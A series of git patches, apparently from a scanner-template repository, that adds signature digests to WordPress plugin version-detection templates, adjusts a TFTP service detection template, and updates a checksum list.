-46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206cd245c05fb4123792e2d65565ee4feb7dd9d7dd66af890ddee34c8967c99d9d022010b8dc67e4a9242765d3c6ba45d6f4d7e95e4c981980264bc50436a187e87908:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..6ff51ba81d 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022053e200b772446b6464d829cb5269d9d8ad420f04d4cddc03b837aa63b715364d022048282b7f9cc20738c0e9900efdd9cdbe67b0a496dcb65cb5745d53909003d5a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..9f537cacb5 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d233884dc23fd43df7efe16480f0becf2bec6dae55fcf013e2826c7e3c74f406022100f6043c52854074ed05cd76062b13c6481afd9ad6398d1de7e5ffa5b88e6006a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..58d70175fe 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100be7f07315c32cfa3f34119f6f2325048723d2f23701743a7f45ed53aa21ba8b302206b859c7c658e87688891a55bd6619c8b21c3dbd815cf7d651ce77e256fa388b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..01cadea2ec 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cacb5cbab8f8aa9bad9e3b7dbe7eae7823efeb1155a92058142c09d754a4780b022100a988cf559bc86ff891281bc18ac71004d78d0c9b93ddaf4958546eacda864ec2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..c9ec315a05 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022063e8d6cdd63e47062906eb576e1ee724f2fc90febfc1f76ce13369850d1efc2102200a227b560c0f2dd5559ee49731a100e9b39e2ba9892357c71e1f0d5d7b40d59a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..9b8bf26b0b 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e0311d0b81b978b292b33f77421547ca5f07123ed37096b299ca69d2051247b6022100f6958782436778744add69e8122c20acba7e6b9cfe2fbafbc4ff1160fc42196d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..b746208597 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c1bd0755f079769d5bc04ea47ded857b919a4317fbe448840c69f249a58481aa02203cf8aca3eb854a7d46cdb6f456af7f9103f70e17d6299b2f4f540adc6ec840a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..0637e1ac4d 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202bf0cf60eacf5f650ea30cc9a5dd49d521dd2c4d95b2cde0a7fad5bfcfc07d4b022068570d84457624853af7d98de2cbda57484fe6a82ed0d6860cbaa6045de39a1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..5b8501a019 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201e47e6aefc3d1aed8d25a827b145231ab8ffee88a1ed079683697fcf0566950e02210080170b10765f006c7af107c592f5267921c48e4f05200946078f4ccd0c936770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..b46d1cb42c 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207e2ca3a745ffc69691a173f10f39ab06d85691623843c3fa1e9b308979a83672022100d7862afc23c5d0408c3f1380e509062fcf17198de7bef72d2f89811cee038112:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..2e02098549 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210098035c3e58a7030463a1f11c0459f7cc02a5bee535e713e0862668fe8e7bec83022006a4953eb34a3fe24f115d9dd19424dea3f711f7ce6e1394546535493dd07e9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..43986c5bd5 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206293a5ae07c2f34de5b778ca923f6f069c37f72658acebbc986569cb4e905e5b022067675de54bbbe7508f8c9f7247d548cc49a0c6f1ad5c3cd736d465f6534c8c98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..24addb9fc2 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b321c4cf27073f13fb192e1e51275995cd03e25f9778d83b7409cc2c76c4d9db0220104d83a1fb962f0446ee1763b554db12f24940415cbed28ca287df7d64d232d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..c5c93eb0df 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206d36f35f1ffe464e71baa537420f9e969018bb78035b3abcb2d6776e4b017930022053db4c1152ffa5076b3e59668f319e339105c1f5d5c804f6b14490fd25b511e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..3c3943d302 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201e9417c1b73f487cef96aa956b0259bc65887de7830482260327c7ccc10c2c3f02202d79b72e4c511ba64c96304bd7293404f388d95c783de0e84927be470122eb07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..bcb676d9c1 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b2ee5ddb0651d437befea6f16257bcc6d77c0564f88e620912f79232e4ed27d8022100d364de1854092d690a3419498e561490bec6de52f97c6e58934d8bd3c17440e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..68afed5f5e 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009fd02aad3b368c87e9ccf55d3ba6ee955952413d812fe68b898fb83f03dfb2c60221009a7712f32559d0859b0e02844b099c463bec50e167dcc7a69d3770a73ce53ef7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..721745bfd9 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022077086134ce3153be67c96aa81872c10e9d3fad3ab1466cb4bad5d43ebb84ffc002210091d7a76695f15883e566fec85b8ac0fe430b34741b436a9e9ebe5f09be90acdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..957fea41d4 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d7e9eb8d16ba13b75f0cca25d1675d7e64a71f066aa9e8225dc756f5049e4678022100cad2f27720266a1bbc37aeb75e85d7d80065c145ade53ea95ad3a68be2835649:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/udp/detection/tftp-detect.yaml b/javascript/udp/detection/tftp-detect.yaml index 0c48085b27..db39369897 100644 --- a/javascript/udp/detection/tftp-detect.yaml +++ b/javascript/udp/detection/tftp-detect.yaml @@ -32,4 +32,4 @@ javascript: words: - "Unknown transfer ID" case-insensitive: true -# digest: 4a0a00473045022100c512c1a23c479681469c4b6a1e1e7a5740dfee043f58cb2a1d79767822cbb32802203dfa42884afa515fb2ac6dd0e0075422bc1f3ece618c6538164c8b9b09062e46:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207ed818c5dbfafa706e7a8ae3d3eae6bc22d810c9e70d3e911d7633c9e23667bc022100eeca5c8334770c6250a07ce1820feb9337f83a2cafe7be75faa580fa77682257:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 12f70a3cc5f9b4829d790082012efc3c5eb7a131 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 24 Jul 2024 16:53:12 +0530 Subject: [PATCH 1594/1841] Update tftp-detect.yaml --- javascript/udp/detection/tftp-detect.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/javascript/udp/detection/tftp-detect.yaml b/javascript/udp/detection/tftp-detect.yaml index 0c48085b27..8849374ba3 100644 --- a/javascript/udp/detection/tftp-detect.yaml +++ b/javascript/udp/detection/tftp-detect.yaml @@ -12,7 +12,9 @@ info: shodan-query: "port:69" tags: js,tftp,udp,network javascript: - - code: | + - pre-condition: | + isUDPPortOpen(Host,Port); + code: | let packet = bytes.NewBuffer(); let message = "1.txt" let data = message; @@ -32,4 +34,3 @@ javascript: words: - "Unknown transfer ID" case-insensitive: true -# digest: 4a0a00473045022100c512c1a23c479681469c4b6a1e1e7a5740dfee043f58cb2a1d79767822cbb32802203dfa42884afa515fb2ac6dd0e0075422bc1f3ece618c6538164c8b9b09062e46:922c64590222798bb761d5b6d8e72950 From d190d441f1118f7b919122ac29872cf1c7595cf8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 24 Jul 2024 17:38:47 +0530 Subject: [PATCH 1595/1841] Update tftp-detect.yaml --- javascript/udp/detection/tftp-detect.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/javascript/udp/detection/tftp-detect.yaml b/javascript/udp/detection/tftp-detect.yaml index 6e465a3d50..8849374ba3 100644 --- a/javascript/udp/detection/tftp-detect.yaml +++ b/javascript/udp/detection/tftp-detect.yaml @@ -34,4 +34,3 @@ javascript: words: - "Unknown transfer ID" case-insensitive: true - From 24a3f5f724523abbf9825cc266eb11c106dcd201 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 24 Jul 2024 12:12:20 +0000 Subject: [PATCH 1597/1841] Auto Generated Templates Checksum [Wed Jul 24 12:12:20 UTC 2024] :robot: --- templates-checksum.txt | 404 ++++++++++++++++++++--------------------- 1 file changed, 202 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 77f4a48b1e..4a86ae931f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -7317,230 +7317,230 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:0e29e912933b8e8dd3815f15a29612b4fea5b7f0 +http/technologies/wordpress/plugins/add-to-any.yaml:1cb1afe7de1bbd97bbad9a9bce2af88eaa34eafc +http/technologies/wordpress/plugins/admin-menu-editor.yaml:91d184098aa33b08747e8b1785c39ea7a244c8ee http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:8782581a7aa8ecbcfaa6616ae05d22b618fe8d04 +http/technologies/wordpress/plugins/akismet.yaml:baffbc71ed5546d7f309b79a3617cbed0b3b3975 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:61a71748cdfd2f04913b6d3ec0490343bfd69889 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:05954ea2468467568fca5cbeb8fd61337272aa15 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:fc34c96de9e84156ce6824bafa9bb58241d1a341 +http/technologies/wordpress/plugins/amp.yaml:09d633f2b3b8994415107928b0cabe74f62fe8bc +http/technologies/wordpress/plugins/antispam-bee.yaml:1fd2d8acd0d5f970fd8ff1081f10e8ebcbfad7b3 +http/technologies/wordpress/plugins/astra-sites.yaml:a44f0edf657625fba0084116630f86c505e2c2a1 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:a1d5ae6e8e8f35929e6bdfe7c55e4ca4b1894901 +http/technologies/wordpress/plugins/backwpup.yaml:463a7cf6a9944baf51d47e9db340768a6162ac7d +http/technologies/wordpress/plugins/better-search-replace.yaml:1a55b42a11011e08c85a8ebddfd97b2794190128 +http/technologies/wordpress/plugins/better-wp-security.yaml:48e8b89e241ed48abb39e93cef05579ee149b25d +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:03f59b92e333ab1c0ac2c8a299caf2c76d0934dc +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:8dbd6290313a07d191199b7b594afb60e492b77b +http/technologies/wordpress/plugins/breeze.yaml:8cb028df4a934a19c0e0cdea335f5460d38c2918 +http/technologies/wordpress/plugins/broken-link-checker.yaml:78faa62e5fd2fe7f9e751022928352dd14447709 +http/technologies/wordpress/plugins/chaty.yaml:d7908b7921c42b511498596c5f692de0d4d10d7a +http/technologies/wordpress/plugins/child-theme-configurator.yaml:b4bdbb8e75ca509358ae840ff67af424bb16d6f2 +http/technologies/wordpress/plugins/classic-editor.yaml:aa0a92b7d37cfceafbae202b8fd2a2a89b6a954a +http/technologies/wordpress/plugins/classic-widgets.yaml:e4842012f7f15772cf44fea9877d3db5c4e99fba +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:73a611bb2c741fe0c8a410f0212928aa228db118 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:906213a4b0c8b710d9a7985a496cd0db666d26f1 +http/technologies/wordpress/plugins/coblocks.yaml:031264bf19ca70eb58afa97d3b180c06aa80771c +http/technologies/wordpress/plugins/code-snippets.yaml:5f3922fdc9b54d99e9bab33427e2ad8f01635955 +http/technologies/wordpress/plugins/coming-soon.yaml:4ac76df4e336c3ba21d658416628430107538d8b +http/technologies/wordpress/plugins/complianz-gdpr.yaml:0d6a406d16368278480420824d9ebb45b828415f +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:ca68ddd636ef80f97e4233d6e255c555f65da6bd +http/technologies/wordpress/plugins/contact-form-7.yaml:2232d2757ec465fbef216e5aa2d43c7c03af34fb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:d11c4764e8687865fc836ff82390e59c68b6bca3 +http/technologies/wordpress/plugins/cookie-law-info.yaml:69976fd260670c1bd5fd78b7e232d8061d5920d4 +http/technologies/wordpress/plugins/cookie-notice.yaml:5b56bcd8c6cfab9d5f807693a474705e7b042c03 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:bb6d9674a56ac25af5b45b0935d59e0f33bc4415 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:9baf0e04863ba2d7f7e973999ced390dfe26d0eb +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:d89199efb21309f0cbcec5bd1a1343a86185cbff +http/technologies/wordpress/plugins/custom-css-js.yaml:6af37d0b8070430cd989b66b1ec8a927130fd693 +http/technologies/wordpress/plugins/custom-fonts.yaml:dcae6566dd00f01def89961a5cff9d6eed350b9c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:c476d62b4bdbd0eba9037e89a9bd156c19950155 +http/technologies/wordpress/plugins/disable-comments.yaml:87da1801b3ad736121ca5b6c6b5d62c28bde9c9e +http/technologies/wordpress/plugins/disable-gutenberg.yaml:b0455a3829fb689833f3028cb06120e4baa5243c +http/technologies/wordpress/plugins/duplicate-page.yaml:7dc1a8e71fe4e76a930da266f9ee0e55ff2c0d41 +http/technologies/wordpress/plugins/duplicate-post.yaml:52fa1b9e4a1e4fe33fec480961392a8409ce3390 +http/technologies/wordpress/plugins/duplicator.yaml:5218b2348dcc730d2cd46b0d9a58f120b781c3ed +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:8d6783db06d19f9ef5ce436a3598af7c6370b796 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluent-smtp.yaml:f8756f30bfdc614abb6aa0cef6f395e5a96615d8 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e -http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa -http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 -http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 -http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 